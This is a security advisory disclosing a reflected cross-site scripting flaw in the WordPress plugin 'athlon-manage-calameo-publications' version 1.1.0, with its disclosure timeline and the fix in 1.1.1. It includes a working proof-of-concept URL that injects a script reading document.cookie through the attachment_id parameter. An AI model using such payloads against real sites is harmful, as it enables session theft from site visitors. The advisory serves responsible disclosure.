wp-plugin : athlon-manage-calameo-publications | Code Vigilant : to err is human.. To fix is Humanity

Wp Plugin Athlon Manage Calameo Publications

Plugin Details

Plugin Name: wp-plugin : athlon-manage-calameo-publications

Effected Version : 1.1.0 (and most probably lower version's if any)

Vulnerability : Cross-Site Scripting (XSS)

Minimum Level of Access Required : Unauthenticated

CVE Number :

Identified by : Anantshri

WPScan Reference URL

Disclosure Timeline

January 4, 2014: Vendor Contacted
January 7, 2014 : Plugin Updated
July 7, 2014 : Public Disclosure

Technical Details

 http://localhost/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id"><script>alert(document.cookie)</script>&

Vulnerable Parameter : attachment_id

Type of XSS : Reflected

Fixed in : 1.1.1

Trac Changelog : https://plugins.trac.wordpress.org/changeset/834393/athlon-manage-calameo-publications/trunk/thickbox_content.php?old=690538&old_path=athlon-manage-calameo-publications%2Ftrunk%2Fthickbox_content.php